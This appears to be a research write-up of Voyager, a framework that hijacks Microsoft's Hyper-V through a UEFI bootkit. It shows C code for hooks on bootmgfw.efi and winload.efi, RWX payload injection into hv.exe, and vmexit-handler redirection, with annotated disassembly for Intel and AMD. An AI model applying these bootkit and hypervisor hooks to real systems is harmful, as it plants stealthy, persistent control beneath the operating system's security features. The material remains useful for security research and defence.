
Voyager - A Hyper-V Hacking Framework

Voyager is a Hyper-V hijacking project, based on existing Hyper-V hijacking work by cr4sh, that aims to extend support to AMD processors and earlier Windows 10 versions.

Download link: Voyager

Table Of Contents

- Keywords

- Abstract

- Credit

- Introduction

- bootmgfw.efi

- winload.efi

- Hyper-V Intel - vm exit handler location and hooking

- Hyper-V AMD - vm exit handler location and hooking

- Hyper-V Payload - Injection, vmexit handler hooking

- Hyper-V Page Tables - Extended Page Tables, Host Page Tables

- Payload - Page Tables

- Voyager - VDM Support & Legacy Projects

- Possible Detection - UEFI Reclaimable Memory

- Conclusion

Keywords

Hyper-V, UEFI, Windows 10, Hyperjacking, VDM, PTM, Intel, AMD

Abstract

Voyager is a project designed to hyperjack Hyper-V on UEFI-based systems. Hyper-V is a type-1 hypervisor written by Microsoft that supports both Intel and AMD processors. Voyager offers module injection and vmexit handler hooking for both the Intel and AMD variants of Hyper-V.

Credit

cr4sh - this project is based on existing work by cr4sh. It adds support for AMD processors, an alternative payload injection method, and support for a few more Windows 10 versions.

btbd - suggestions, input, and help with hypervisor- and UEFI-related topics, specifically file operation APIs and EPT PFN help.

daax - suggestions, input, and help with AMD hypervisor technology, specifically AMD's NPT. Also provided input on the development of my own hypervisor.

Useful References

- Hyper-V Internals - gerhart (Hyper-V researcher, amazing work)

- Hyper-V Backdoor - cr4sh (amazing work on DMA stuff and secure boot as well)

- VMware GDB & IDA Pro setup - 0xnemi (use a while (true) loop and break into the VM)

Introduction

Voyager builds on cr4sh's existing Hyper-V hijacking work and extends it to AMD processors and earlier Windows 10 versions. It does not yet support Secure Boot or legacy BIOS. I highly recommend checking out cr4sh's work on Hyper-V, as this project is almost entirely based on it, with only minor differences in injection techniques.

Hyper-V is a type-1 hypervisor written and maintained by Microsoft. It supports both Intel and AMD virtualization technology and is the core component of virtualization-based security (VBS). With VBS features such as HVCI enabled, Hyper-V imposes strict limitations on Windows kernel driver developers, such as the inability to byte-patch non-writable sections of kernel drivers, the inability to disable write protection in CR0, the inability to globally patch ntdll.dll, and much more. Hyper-V launches before ntoskrnl and is completely inaccessible once it is running, so getting inside Hyper-V requires a bootkit.

UEFI transfers control to bootmgfw.efi in 64-bit long mode with a set of page tables already configured, so the jump from writing a kernel driver to writing a UEFI driver (boot or runtime) is not much of a leap. The default boot location on Windows UEFI systems is EFI/Microsoft/Boot/bootmgfw.efi. This file is responsible for loading winload.efi. When control is transferred to winload.efi, bootmgfw.efi on disk must pass integrity checks performed by winload. Although patching these integrity checks is easily possible, restoring the original bootmgfw.efi on disk is preferable, because if a critical error occurs during the boot process, Windows will still boot normally.

bootmgfw.efi

Voyager's UEFI boot driver replaces bootmgfw.efi on disk and is therefore loaded on the next reboot. It first restores the original bootmgfw.efi on disk, then loads bootmgfw.efi into memory via LoadImage, applies inline hooks to it, and runs it via StartImage. The hooks applied to bootmgfw.efi can be found in bootmgfw.c. An inline hook is placed on BlImgStartBootApplication, which has the prototype EFI_STATUS (*)(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs). When bootmgfw.efi calls this function, control flow is transferred to ArchStartBootApplicationHook.

```c
EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs)
{
    // disable ArchStartBootApplication shithook
    DisableInlineHook(&BootMgfwShitHook);

    // on 1703 and below, winload does not export any functions
    if (!GetExport(ImageBase, "BlLdrLoadImage"))
    {
        VOID* ImgLoadPEImageEx =
            FindPattern(
                ImageBase,
                ImageSize,
                LOAD_PE_IMG_SIG,
                LOAD_PE_IMG_MASK
            );

        gST->ConOut->ClearScreen(gST->ConOut);
        gST->ConOut->OutputString(gST->ConOut, AsciiArt);
        Print(L"\n");

        Print(L"Hyper-V PayLoad Size -> 0x%x\n", PayLoadSize());
        Print(L"winload.BlImgLoadPEImageEx -> 0x%p\n", RESOLVE_RVA(ImgLoadPEImageEx, 10, 6));

        MakeInlineHook(&WinLoadImageHook, RESOLVE_RVA(ImgLoadPEImageEx, 10, 6), &BlImgLoadPEImageEx, TRUE);
    }
    else // else the installed windows version is between 2004 and 1709
    {
        VOID* LdrLoadImage = GetExport(ImageBase, "BlLdrLoadImage");
        VOID* ImgAllocateImageBuffer =
            FindPattern(
                ImageBase,
                ImageSize,
                ALLOCATE_IMAGE_BUFFER_SIG,
                ALLOCATE_IMAGE_BUFFER_MASK
            );

        gST->ConOut->ClearScreen(gST->ConOut);
        gST->ConOut->OutputString(gST->ConOut, AsciiArt);
        Print(L"\n");

        Print(L"Hyper-V PayLoad Size -> 0x%x\n", PayLoadSize());
        Print(L"winload.BlLdrLoadImage -> 0x%p\n", LdrLoadImage);
        Print(L"winload.BlImgAllocateImageBuffer -> 0x%p\n", RESOLVE_RVA(ImgAllocateImageBuffer, 5, 1));

        MakeInlineHook(&WinLoadImageHook, LdrLoadImage, &BlLdrLoadImage, TRUE);
        MakeInlineHook(&WinLoadAllocateImageHook, RESOLVE_RVA(ImgAllocateImageBuffer, 5, 1), &BlImgAllocateImageBuffer, TRUE);
    }

    return ((IMG_ARCH_START_BOOT_APPLICATION)BootMgfwShitHook.Address)(AppEntry, ImageBase, ImageSize, BootOption, ReturnArgs);
}
```

This hook applies further hooks to winload.efi. Which hooks are applied depends on the Windows 10 version Voyager is compiled for. On Windows 10 1709 and above, winload.efi exports a number of useful routines that are called by other modules it loads. On older versions of Windows 10, these routines are instead duplicated across multiple files. For example, hvloader.(efi/dll) imports "BlLdrLoadImage", which is used to load Hyper-V, whereas on 1703 a duplicate of "BlLdrLoadImage" lives inside hvloader.(efi/dll) itself, so there is no export to hook and the routine has to be found by signature scanning instead. This is the beginning of the multi-winver nightmare of supporting every version of Windows 10 on both Intel and AMD.
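Neither FindPattern nor RESOLVE_RVA is shown in the post. The sketch below is one plausible shape for them, assuming FindPattern takes a byte signature plus an "x"/"?" mask (a common convention for signature scanners) and assuming RESOLVE_RVA(Instr, Len, DispOffset) returns the address of the next instruction plus the signed 32-bit displacement found DispOffset bytes into the match. Under that reading, the (5, 1) pair resolves a plain E8 rel32 call. The names find_pattern and resolve_rva are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical scanner: first address in [base, base + size) where sig
 * matches; '?' in mask is a wildcard byte, any other character must match. */
static const uint8_t *find_pattern(const uint8_t *base, size_t size,
                                   const uint8_t *sig, const char *mask)
{
    size_t len = strlen(mask);
    if (len == 0 || len > size)
        return NULL;

    for (size_t i = 0; i + len <= size; ++i) {
        size_t j = 0;
        while (j < len && (mask[j] == '?' || base[i + j] == sig[j]))
            ++j;
        if (j == len)
            return base + i;
    }
    return NULL;
}

/* Hypothetical RIP-relative resolver: instr_len is the distance from instr
 * to the next instruction, disp_offset is where the rel32 operand sits. */
static const uint8_t *resolve_rva(const uint8_t *instr, size_t instr_len,
                                  size_t disp_offset)
{
    int32_t disp;
    memcpy(&disp, instr + disp_offset, sizeof(disp)); /* unaligned-safe read */
    return instr + instr_len + disp;
}
```

A signature that starts one instruction before the call simply shifts both numbers, which is presumably why the 1703 path uses (10, 6) rather than (5, 1).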

The hook restores the original bytes of the hooked bootmgfw.efi routine before doing anything else, and once the winload.efi hooks are in place it calls the original routine itself. Winload.efi then creates a new address space and switches between it and the UEFI handoff context. During winload.efi's execution, hvloader.efi is loaded into memory, followed by the Hyper-V module.
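MakeInlineHook, EnableInlineHook and DisableInlineHook are not shown either. A minimal sketch, assuming a 14-byte absolute jump (FF 25 00 00 00 00 followed by the 64-bit destination) and memory that is writable at this stage of boot, keeps the original bytes and the jump side by side so that disabling the hook is just a copy back. All names here are hypothetical stand-ins for the real helpers.

```c
#include <stdint.h>
#include <string.h>

#define JMP_SIZE 14

/* Hypothetical hook record: patched address, the bytes it held, and the
 * absolute jump that replaces them. */
typedef struct {
    uint8_t *address;
    uint8_t original[JMP_SIZE];
    uint8_t jmp[JMP_SIZE];
} inline_hook_t;

/* Build "jmp qword ptr [rip+0]" followed by the 64-bit destination. */
static void make_inline_hook(inline_hook_t *hook, uint8_t *address,
                             uint64_t destination, int enable)
{
    static const uint8_t stub[6] = {0xFF, 0x25, 0x00, 0x00, 0x00, 0x00};

    hook->address = address;
    memcpy(hook->original, address, JMP_SIZE);
    memcpy(hook->jmp, stub, sizeof(stub));
    memcpy(hook->jmp + sizeof(stub), &destination, sizeof(destination));

    if (enable)
        memcpy(hook->address, hook->jmp, JMP_SIZE);
}

static void enable_inline_hook(inline_hook_t *hook)
{
    memcpy(hook->address, hook->jmp, JMP_SIZE);
}

/* Restores the original bytes so the function can be called normally. */
static void disable_inline_hook(inline_hook_t *hook)
{
    memcpy(hook->address, hook->original, JMP_SIZE);
}
```

Restoring the bytes before calling the original, as ArchStartBootApplicationHook and the winload hooks do, avoids the need for a trampoline. The trade-off is that the function is briefly unhooked, which is only safe if nothing else can execute it concurrently, as is generally the case in a UEFI boot application.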

winload.efi

On Windows 10 1709 and up, winload.efi exports a plethora of utility routines, such as mapping and unmapping physical memory, allocating and freeing virtual memory, reading files from disk, and much more.

BlLdrLoadImage

One such routine is BlLdrLoadImage, which loads images from disk. It calls further functions to allocate virtual memory for the module, resolve imports, map sections, and apply relocations. Hooking this routine is useful because it tells us which module is being loaded into memory.

```c
EFI_STATUS EFIAPI BlLdrLoadImage
(
    VOID* Arg1,
    CHAR16* ModulePath,
    CHAR16* ModuleName,
    VOID* Arg4,
    VOID* Arg5,
    VOID* Arg6,
    VOID* Arg7,
    PPLDR_DATA_TABLE_ENTRY lplpTableEntry,
    VOID* Arg9,
    VOID* Arg10,
    VOID* Arg11,
    VOID* Arg12,
    VOID* Arg13,
    VOID* Arg14,
    VOID* Arg15,
    VOID* Arg16
)
{
    if (!StrCmp(ModuleName, L"hv.exe"))
        HyperVloading = TRUE;

    // disable hook and call the original function...
    DisableInlineHook(&WinLoadImageHook);
    EFI_STATUS Result = ((LDR_LOAD_IMAGE)WinLoadImageHook.Address)
    (
        Arg1, ModulePath, ModuleName, Arg4, Arg5, Arg6, Arg7, lplpTableEntry,
        Arg9, Arg10, Arg11, Arg12, Arg13, Arg14, Arg15, Arg16
    );

    // continue hooking until we inject/hook into hyper-v...
    if (!HookedHyperV)
        EnableInlineHook(&WinLoadImageHook);

    if (!StrCmp(ModuleName, L"hv.exe"))
    {
        HookedHyperV = TRUE;
        VOYAGER_T VoyagerData;
        PLDR_DATA_TABLE_ENTRY TableEntry = *lplpTableEntry;

        // add a new section to hyper-v called "payload", then fill in voyager data
        // and hook the vmexit handler...
        MakeVoyagerData
        (
            &VoyagerData,
            TableEntry->ModuleBase,
            TableEntry->SizeOfImage,
            AddSection
            (
                TableEntry->ModuleBase,
                "payload",
                PayLoadSize(),
                SECTION_RWX
            ),
            PayLoadSize()
        );

        HookVmExit
        (
            VoyagerData.HypervModuleBase,
            VoyagerData.HypervModuleSize,
            MapModule(&VoyagerData, PayLoad)
        );

        // extend the size of the image in hyper-v's nt headers and LDR data entry...
        // this is required, if this is not done, then hyper-v will simply not be loaded...
        TableEntry->SizeOfImage = NT_HEADER(TableEntry->ModuleBase)->OptionalHeader.SizeOfImage;
    }

    return Result;
}
```

BlImgAllocateImageBuffer

Another such routine is "BlImgAllocateImageBuffer", which is responsible for allocating virtual memory for loaded modules. The size passed to it comes from the optional header field "SizeOfImage", which holds the image's virtual size, i.e. its size in memory. By hooking this routine, we can extend the Hyper-V allocation to also include the "SizeOfImage" of the Hyper-V payload. This allows a payload of any size to be mapped directly after Hyper-V, and therefore within a 32-bit (±2 GB) displacement of it, which makes it possible to patch RIP-relative instructions such as JMP, CALL and MOV so that they reach the payload.
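The arithmetic behind this is small. The sketch below assumes the payload is appended as one new section at the old SizeOfImage rounded up to SectionAlignment. It shows how the new SizeOfImage (the value BlLdrLoadImage later copies back into the LDR entry) is derived, and why the appended payload stays reachable from a rel32 CALL or JMP inside Hyper-V. The helper names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Round value up to a multiple of align (a power of two, as PE alignments are). */
static uint64_t align_up(uint64_t value, uint64_t align)
{
    return (value + align - 1) & ~(align - 1);
}

/* RVA at which a section appended to the image would start. */
static uint32_t appended_section_rva(uint32_t size_of_image, uint32_t section_alignment)
{
    return (uint32_t)align_up(size_of_image, section_alignment);
}

/* SizeOfImage after appending payload_size bytes of section data. */
static uint32_t extended_size_of_image(uint32_t size_of_image, uint32_t payload_size,
                                       uint32_t section_alignment)
{
    uint64_t rva = appended_section_rva(size_of_image, section_alignment);
    return (uint32_t)align_up(rva + payload_size, section_alignment);
}

/* True if a rel32 CALL/JMP whose next instruction is at next_ip can reach target. */
static bool fits_rel32(uint64_t next_ip, uint64_t target)
{
    int64_t delta = (int64_t)(target - next_ip);
    return delta >= INT32_MIN && delta <= INT32_MAX;
}
```

For example, with the 0x1600000-byte hv.exe image from the allocation log in the hook below and a made-up 0x1234-byte payload, the payload section starts at RVA 0x1600000 and SizeOfImage becomes 0x1602000 (assuming 4 KB alignment). Every call site inside hv.exe is then well within ±2 GB of the payload.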

```c
UINT64 EFIAPI BlImgAllocateImageBufferHook
(
    VOID** imageBuffer,
    UINTN imageSize,
    UINT32 memoryType,
    UINT32 attributes,
    VOID* unused,
    UINT32 Value
)
{
    //
    // hv.exe
    // [BlImgAllocateImageBuffer] Alloc Base -> 0x7FFFF9FE000, Alloc Size -> 0x17C548
    // [BlImgAllocateImageBuffer] Alloc Base -> 0xFFFFF80608120000, Alloc Size -> 0x1600000
    // [BlImgAllocateImageBuffer] Alloc Base -> 0xFFFFF80606D68000, Alloc Size -> 0x2148
    // [BlLdrLoadImage] Image Base -> 0xFFFFF80608120000, Image Size -> 0x1600000
    //
    if (HyperVloading && !ExtendedAllocation && imageSize == HyperV->OptionalHeaders.SizeOfImage)
    {
        ExtendedAllocation = TRUE;
        imageSize += PayLoadSize();

        // allocate the entire hyper-v module as rwx...
        memoryType = BL_MEMORY_ATTRIBUTE_RWX;
    }

    // disable hook and call the original function...
    DisableInlineHook(&WinLoadAllocateImageHook);
    UINT64 Result = ((ALLOCATE_IMAGE_BUFFER)WinLoadAllocateImageHook.Address)
    (
        imageBuffer,
        imageSize,
        memoryType,
        attributes,
        unused,
        Value
    );

    // keep hooking until we extend an allocation...
    if (!ExtendedAllocation)
        EnableInlineHook(&WinLoadAllocateImageHook);

    return Result;
}
```

Hyper-V Intel - vm exit handler location and hooking

The vmexit handler of Intel Hyper-V (hvix64.exe) is easy to locate by searching for the immediate value 0x6C16, the VMCS field encoding for the host RIP (VMCS_HOST_RIP): the value Hyper-V writes to this field is the address at which the processor resumes on every VM exit, i.e. the vmexit handler. Another method is to search for the vmresume instruction. Just before it, look for general-purpose registers being saved onto the stack or into a context structure, followed by a call or jmp to another routine (the "C/C++" vmexit handler). Hyper-V's 20H2 vmexit handler looks like the following.

```asm
FFFFF8000023D36A vmexit_handler:
FFFFF8000023D36A C7 44 24 30 00 00 00 00 mov dword ptr [rsp+arg_28], 0
FFFFF8000023D372 48 89 4C 24 28 mov [rsp+arg_20], rcx
FFFFF8000023D377 48 8B 4C 24 20 mov rcx, [rsp+arg_18]
FFFFF8000023D37C 48 8B 09 mov rcx, [rcx]
FFFFF8000023D37F 48 89 01 mov [rcx], rax
FFFFF8000023D382 48 89 51 10 mov [rcx+10h], rdx
FFFFF8000023D386 48 89 59 18 mov [rcx+18h], rbx
FFFFF8000023D38A 48 89 69 28 mov [rcx+28h], rbp
FFFFF8000023D38E 48 89 71 30 mov [rcx+30h], rsi
FFFFF8000023D392 48 89 79 38 mov [rcx+38h], rdi
FFFFF8000023D396 4C 89 41 40 mov [rcx+40h], r8
FFFFF8000023D39A 4C 89 49 48 mov [rcx+48h], r9
FFFFF8000023D39E 4C 89 51 50 mov [rcx+50h], r10
FFFFF8000023D3A2 4C 89 59 58 mov [rcx+58h], r11
FFFFF8000023D3A6 4C 89 61 60 mov [rcx+60h], r12
FFFFF8000023D3AA 4C 89 69 68 mov [rcx+68h], r13
FFFFF8000023D3AE 4C 89 71 70 mov [rcx+70h], r14
FFFFF8000023D3B2 4C 89 79 78 mov [rcx+78h], r15
FFFFF8000023D3B6 48 8B 44 24 28 mov rax, [rsp+arg_20]
FFFFF8000023D3BB 48 89 41 08 mov [rcx+8], rax
FFFFF8000023D3BF 48 8D 41 70 lea rax, [rcx+70h]
FFFFF8000023D3C3 0F 29 40 10 movaps xmmword ptr [rax+10h], xmm0
FFFFF8000023D3C7 0F 29 48 20 movaps xmmword ptr [rax+20h], xmm1
FFFFF8000023D3CB 0F 29 50 30 movaps xmmword ptr [rax+30h], xmm2
FFFFF8000023D3CF 0F 29 58 40 movaps xmmword ptr [rax+40h], xmm3
FFFFF8000023D3D3 0F 29 60 50 movaps xmmword ptr [rax+50h], xmm4
FFFFF8000023D3D7 0F 29 68 60 movaps xmmword ptr [rax+60h], xmm5
FFFFF8000023D3DB 48 8B 54 24 20 mov rdx, [rsp+arg_18]
FFFFF8000023D428 E8 43 CF FF FF call sub_FFFFF8000023A370
FFFFF8000023D42D 65 C6 04 25 6D 00 00 00 00 mov byte ptr gs:6Dh, 0
FFFFF8000023D436 48 8B 4C 24 20 mov rcx, [rsp+arg_18]
FFFFF8000023D43B 48 8B 54 24 30 mov rdx, [rsp+arg_28]
FFFFF8000023D440 E8 BB 44 FD FF call vm_exit_c_handler
FFFFF8000023D100 65 C6 04 25 6D 00 00 00 01 mov byte ptr gs:6Dh, 1
FFFFF8000023D110 48 8B 54 24 20 mov rdx, [rsp+arg_18]
FFFFF8000023D115 4C 8B 42 10 mov r8, [rdx+10h]
FFFFF8000023D2A3 48 8B 0A mov rcx, [rdx]
FFFFF8000023D2A6 48 83 C1 70 add rcx, 70h ; 'p'
FFFFF8000023D2B2 48 8B 59 A8 mov rbx, [rcx-58h]
FFFFF8000023D2B6 48 8B 69 B8 mov rbp, [rcx-48h]
FFFFF8000023D2BA 48 8B 71 C0 mov rsi, [rcx-40h]
FFFFF8000023D2BE 48 8B 79 C8 mov rdi, [rcx-38h]
FFFFF8000023D2C2 4C 8B 61 F0 mov r12, [rcx-10h]
FFFFF8000023D2C6 4C 8B 69 F8 mov r13, [rcx-8]
FFFFF8000023D2CA 4C 8B 31 mov r14, [rcx]
FFFFF8000023D2CD 4C 8B 79 08 mov r15, [rcx+8]
FFFFF8000023D30D C6 42 20 00 mov byte ptr [rdx+20h], 0
FFFFF8000023D311 0F 28 41 10 movaps xmm0, xmmword ptr [rcx+10h]
FFFFF8000023D315 0F 28 49 20 movaps xmm1, xmmword ptr [rcx+20h]
FFFFF8000023D319 0F 28 51 30 movaps xmm2, xmmword ptr [rcx+30h]
FFFFF8000023D31D 0F 28 59 40 movaps xmm3, xmmword ptr [rcx+40h]
FFFFF8000023D321 0F 28 61 50 movaps xmm4, xmmword ptr [rcx+50h]
FFFFF8000023D325 0F 28 69 60 movaps xmm5, xmmword ptr [rcx+60h]
FFFFF8000023D329 4D 8B 48 10 mov r9, [r8+10h]
FFFFF8000023D32D 33 C0 xor eax, eax
FFFFF8000023D32F BA 01 00 00 00 mov edx, 1
FFFFF8000023D334 41 0F B0 91 27 01 00 00 cmpxchg [r9+127h], dl
FFFFF8000023D33C 48 8B 41 90 mov rax, [rcx-70h]
FFFFF8000023D340 48 8B 51 A0 mov rdx, [rcx-60h]
FFFFF8000023D344 4C 8B 41 D0 mov r8, [rcx-30h]
FFFFF8000023D348 4C 8B 49 D8 mov r9, [rcx-28h]
FFFFF8000023D34C 4C 8B 51 E0 mov r10, [rcx-20h]
FFFFF8000023D350 4C 8B 59 E8 mov r11, [rcx-18h]
FFFFF8000023D354 48 8B 49 98 mov rcx, [rcx-68h]
FFFFF8000023D35A 0F 01 C3 vmresume
```
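Both search strategies for the Intel handler reduce to byte scans over hvix64.exe's code. The sketch below, with hypothetical helper names, looks for the little-endian immediate 16 6C 00 00 (as it would appear in, say, `mov ecx, 6C16h`, encoded B9 16 6C 00 00) and for the vmresume opcode 0F 01 C3 seen at the end of the listing. Each hit is only a candidate that still has to be confirmed by hand in IDA.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define VMCS_HOST_RIP 0x6C16u

/* Count every offset where needle occurs in buf, recording up to max_hits. */
static size_t find_all(const uint8_t *buf, size_t size,
                       const uint8_t *needle, size_t needle_len,
                       size_t *hits, size_t max_hits)
{
    size_t count = 0;
    if (needle_len == 0 || needle_len > size)
        return 0;
    for (size_t i = 0; i + needle_len <= size; ++i) {
        if (memcmp(buf + i, needle, needle_len) == 0) {
            if (count < max_hits)
                hits[count] = i;
            ++count;
        }
    }
    return count;
}

/* The field encoding as a little-endian 32-bit immediate operand. */
static size_t find_host_rip_immediates(const uint8_t *text, size_t size,
                                       size_t *hits, size_t max_hits)
{
    const uint8_t imm[4] = {VMCS_HOST_RIP & 0xFF, (VMCS_HOST_RIP >> 8) & 0xFF, 0x00, 0x00};
    return find_all(text, size, imm, sizeof(imm), hits, max_hits);
}

static size_t find_vmresume(const uint8_t *text, size_t size,
                            size_t *hits, size_t max_hits)
{
    const uint8_t op[3] = {0x0F, 0x01, 0xC3}; /* vmresume */
    return find_all(text, size, op, sizeof(op), hits, max_hits);
}
```

The byte-level search is deliberately naive: it also matches bytes that straddle instruction boundaries, which is why the hits are treated as leads for manual inspection rather than answers.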

Note: the call vm_exit_c_handler is the most important instruction in the entire exit handler, as its RIP-relative displacement (the rel32 operand of the E8 call) will be patched so that it calls the Hyper-V payload's vmexit handler instead.
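Patching that call comes down to rewriting its rel32 operand. The sketch below uses a hypothetical helper name and assumes the CALL bytes are writable at the point of patching. It computes the original target and the new displacement. Applied to the call at FFFFF8000023D440 (E8 BB 44 FD FF), the old target resolves to FFFFF80000211900. Returning that old target is one way to give the payload the address of the handler it later forwards to.

```c
#include <stdint.h>
#include <string.h>

/* Redirect an E8 rel32 CALL located at call_va (mapped at call_ptr) to
 * new_target_va. Returns the original absolute target, or 0 if the bytes
 * are not a rel32 call or the new target is out of rel32 reach. */
static uint64_t patch_call_rel32(uint8_t *call_ptr, uint64_t call_va,
                                 uint64_t new_target_va)
{
    int32_t old_rel;
    if (call_ptr[0] != 0xE8)
        return 0;

    memcpy(&old_rel, call_ptr + 1, sizeof(old_rel));
    uint64_t next_ip = call_va + 5;                 /* E8 + 4-byte operand */
    uint64_t old_target = next_ip + (uint64_t)(int64_t)old_rel;

    int64_t new_rel = (int64_t)(new_target_va - next_ip);
    if (new_rel < INT32_MIN || new_rel > INT32_MAX)
        return 0;

    int32_t rel32 = (int32_t)new_rel;
    memcpy(call_ptr + 1, &rel32, sizeof(rel32));
    return old_target;
}
```

Redirecting the same call to a hypothetical payload handler at FFFFF80001600000 yields the new operand bytes BB 2B 3C 01. If the new target were more than ±2 GB away the helper refuses, which is exactly the situation that mapping the payload directly after Hyper-V avoids.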

Hyper-V AMD - vm exit handler location and hooking

Unlike Intel, where the VMCS is accessed indirectly through VMREAD and VMWRITE, AMD hypervisors interface with their virtual machine control structures directly in memory. AMD calls these structures VMCBs (virtual machine control blocks), and, as on Intel, there is one per logical processor. Locating the VMCBs is a little more difficult, since AMD has no equivalent of VMREAD, VMWRITE or VMPTRLD. There are only VMRUN, VMLOAD and VMSAVE, which do not help in locating the VMCBs because they take the physical address of a VMCB as an input in RAX rather than revealing it. The VMCBs must therefore be located by other means. The relevant section of the AMD64 Architecture Programmer's Manual, Volume 2, reads:

15.5.2 VMSAVE and VMLOAD Instructions

These instructions transfer additional guest register context, including hidden context that is not otherwise accessible, between the processor and a guest's VMCB for a more complete context switch than VMRUN and #VMEXIT perform. The system physical address of the VMCB is specified in rAX. When these operations are needed, VMLOAD would be executed as desired prior to executing a VMRUN, and VMSAVE at any desired point after a #VMEXIT.

The VMSAVE and VMLOAD instructions take the physical address of a VMCB in rAX. These instructions complement the state save/restore abilities of VMRUN instruction and #VMEXIT. They provide access to hidden processor state that software cannot otherwise access, as well as additional privileged state.

These instructions handle the following register state:

• FS, GS, TR, LDTR (including all hidden state)
• KernelGsBase
• STAR, LSTAR, CSTAR, SFMASK
• SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP

Like VMRUN, these instructions are only available at CPL0 (otherwise causing a #GP(0) exception) and are only valid in protected mode with SVM enabled via EFER.SVME (otherwise causing a #UD exception).

Locating VMCB

The VMCB can be located once the vmexit handler is found, because the handler references VMCB fields such as the exit code, which sits at offset 0x70 in the VMCB. Luckily, the vmexit handler itself is trivial to find: search the AMD Hyper-V module (hvax64.exe) for VMRUN instructions (0F 01 D8). The vmexit handler should look something like this:

```asm
FFFFF80000290154 vmexit_handler:
FFFFF80000290154 0F 01 D8 vmrun
FFFFF80000290157 48 8B 44 24 20 mov rax, [rsp+arg_18]
FFFFF8000029015C 0F 0D 08 prefetchw byte ptr [rax]
FFFFF8000029015F 0F 0D 48 40 prefetchw byte ptr [rax+40h]
FFFFF80000290163 0F 0D 88 80 00 00 00 prefetchw byte ptr [rax+80h]
FFFFF8000029016A 0F 0D 88 C0 00 00 00 prefetchw byte ptr [rax+0C0h]
FFFFF80000290171 0F 0D 88 00 01 00 00 prefetchw byte ptr [rax+100h]
FFFFF80000290178 0F 0D 88 40 01 00 00 prefetchw byte ptr [rax+140h]
FFFFF8000029017F 48 8B 44 24 28 mov rax, [rsp+arg_20]
FFFFF80000290184 0F 01 DB vmsave
FFFFF80000290187 66 B8 30 00 mov ax, 30h
FFFFF8000029018B 0F 00 D8 ltr ax
FFFFF8000029018E 66 B8 20 00 mov ax, 20h
FFFFF80000290192 66 8E E8 mov gs, ax
FFFFF80000290195 FA cli
FFFFF80000290196 48 8B 44 24 20 mov rax, [rsp+arg_18]
FFFFF8000029019B 48 89 48 08 mov [rax+8], rcx
FFFFF8000029019F 48 89 50 10 mov [rax+10h], rdx
FFFFF800002901A3 48 89 58 18 mov [rax+18h], rbx
FFFFF800002901A7 48 89 68 28 mov [rax+28h], rbp
FFFFF800002901AB 48 89 70 30 mov [rax+30h], rsi
FFFFF800002901AF 48 89 78 38 mov [rax+38h], rdi
FFFFF800002901B3 4C 89 40 40 mov [rax+40h], r8
FFFFF800002901B7 4C 89 48 48 mov [rax+48h], r9
FFFFF800002901BB 4C 89 50 50 mov [rax+50h], r10
FFFFF800002901BF 4C 89 58 58 mov [rax+58h], r11
FFFFF800002901C3 4C 89 60 60 mov [rax+60h], r12
FFFFF800002901C7 4C 89 68 68 mov [rax+68h], r13
FFFFF800002901CB 4C 89 70 70 mov [rax+70h], r14
FFFFF800002901CF 4C 89 78 78 mov [rax+78h], r15
FFFFF800002901D3 4C 8B C0 mov r8, rax
FFFFF800002901D6 48 8D 80 00 01 00 00 lea rax, [rax+100h]
FFFFF800002901DD 0F 29 40 80 movaps xmmword ptr [rax-80h], xmm0
FFFFF800002901E1 0F 29 48 90 movaps xmmword ptr [rax-70h], xmm1
FFFFF800002901E5 0F 29 50 A0 movaps xmmword ptr [rax-60h], xmm2
FFFFF800002901E9 0F 29 58 B0 movaps xmmword ptr [rax-50h], xmm3
FFFFF800002901ED 0F 29 60 C0 movaps xmmword ptr [rax-40h], xmm4
FFFFF800002901F1 0F 29 68 D0 movaps xmmword ptr [rax-30h], xmm5
FFFFF800002901F5 8B 04 24 mov eax, [rsp+0]
FFFFF800002901F8 8B 54 24 04 mov edx, [rsp+4]
FFFFF800002901FC B9 01 01 00 C0 mov ecx, 0C0000101h
FFFFF80000290201 0F 30 wrmsr
FFFFF80000290203 E8 38 DD FF FF call sub_FFFFF8000028DF40
FFFFF80000290208 65 C6 04 25 6D 00 00 00 00 mov byte ptr gs:6Dh, 0
FFFFF80000290211 48 8B 0C 24 mov rcx, [rsp+0]
FFFFF80000290215 48 8B 54 24 20 mov rdx, [rsp+arg_18]
FFFFF8000029021A E8 51 EA F8 FF call vmexit_c_handler
```

As you can see, the last instruction in the assembly above calls into the C vmexit handler. This C/C++ code should contain a switch on the #VMEXIT reason. By tracing in IDA where the switch condition comes from, we can derive the location of the VMCB.

```c
switch (vmcb->exit_reason) // exit_reason is 0x70 deep into the VMCB...
{
case VMEXIT_CPUID:
    // ...
    break;
case VMEXIT_VMRUN:
    // ...
    break;
case VMEXIT_VMLOAD:
    // ...
    break;
case VMEXIT_HLT:
    // ...
    break;
default:
    __debugbreak();
}
```
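The switch above only needs the exit code. As a sketch, a C view of just the part of the VMCB control area used here could look like the following: EXITCODE at offset 0x70 as described above, with EXITINFO1 and EXITINFO2 after it, plus the SVM exit codes named in the switch (values from the AMD manual's list of SVM intercept codes). The type and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Only the fields needed here; the rest of the control area is padding. */
typedef struct {
    uint8_t  reserved0[0x70];
    uint64_t exit_code;   /* EXITCODE,  offset 0x70 */
    uint64_t exit_info1;  /* EXITINFO1, offset 0x78 */
    uint64_t exit_info2;  /* EXITINFO2, offset 0x80 */
} vmcb_control_t;

_Static_assert(offsetof(vmcb_control_t, exit_code) == 0x70, "EXITCODE offset");

enum svm_exit_code {
    VMEXIT_CPUID  = 0x72,
    VMEXIT_HLT    = 0x78,
    VMEXIT_VMRUN  = 0x80,
    VMEXIT_VMLOAD = 0x82,
};

static const char *exit_name(const vmcb_control_t *control)
{
    switch (control->exit_code) {
    case VMEXIT_CPUID:  return "cpuid";
    case VMEXIT_HLT:    return "hlt";
    case VMEXIT_VMRUN:  return "vmrun";
    case VMEXIT_VMLOAD: return "vmload";
    default:            return "other";
    }
}
```

The static assertion is the useful part when cross-checking IDA output: if a disassembled `[reg+70h]` load feeds the switch, the register holding the base is a good VMCB candidate.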

